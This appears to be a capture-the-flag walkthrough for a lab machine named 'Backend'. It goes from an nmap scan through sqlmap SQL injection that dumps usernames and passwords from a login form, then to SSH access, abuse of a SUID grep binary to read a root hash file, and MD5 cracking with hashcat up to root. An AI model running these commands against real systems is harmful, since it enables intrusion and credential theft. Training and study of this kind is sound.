Backend
export TARGET_IP=172.17.0.2
sudo nmap -p0- $TARGET_IP
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Database Enumeration
Utilize sqlmap to enumerate databases:
sqlmap -u http://172.17.0.2/login.html --forms --dbs -batch
Databases Found:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users
Table Enumeration
Identify tables within the users database:
sqlmap -u http://172.17.0.2/login.html --forms -D users --tables -batch
Tables Found:
| usuarios |
Column Enumeration
List columns in the usuarios table:
sqlmap -u http://172.17.0.2/login.html --forms -D users -T usuarios --columns -batch
Columns Found:
| id | int(11) |
| password | varchar(255) |
| username | varchar(255) |
Data Extraction
Dump data from the usuarios table:
sqlmap -u http://172.17.0.2/login.html --forms -D users -T usuarios -C id,username,password --dump -batch
Extracted Data:
| id | username | password |
| 1 | paco | $paco$123 |
| 2 | pepe | P123pepe3456P |
| 3 | juan | jjuuaann123 |
SSH Access
Attempt SSH login with extracted credentials:
ssh pepe@172.17.0.2
Privilege Escalation
Find SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Notable SUID Binary:
/usr/bin/grep
Refer to GTFOBins for exploitation techniques.
Root Access
List files in the root directory:
ls -l /root
File Found:
-rw-r--r-- 1 root root 33 Aug 27 15:15 pass.hash
Read the hash:
grep '' /root/pass.hash
Hash:
e43833c4c9d5ac444e16bb94715a75e4
Identify the hash type:
hash-identifier e43833c4c9d5ac444e16bb94715a75e4
Possible Hash:
[+] MD5
Crack the hash using hashcat:
hashcat -m 0 -a 0 "e43833c4c9d5ac444e16bb94715a75e4" /usr/share/wordlists/rockyou.txt
Cracked Password:
spongebob34
Switch to root user:
su root # password: spongebob34
id
Root Confirmation:
uid=0(root) gid=0(root) groups=0(root)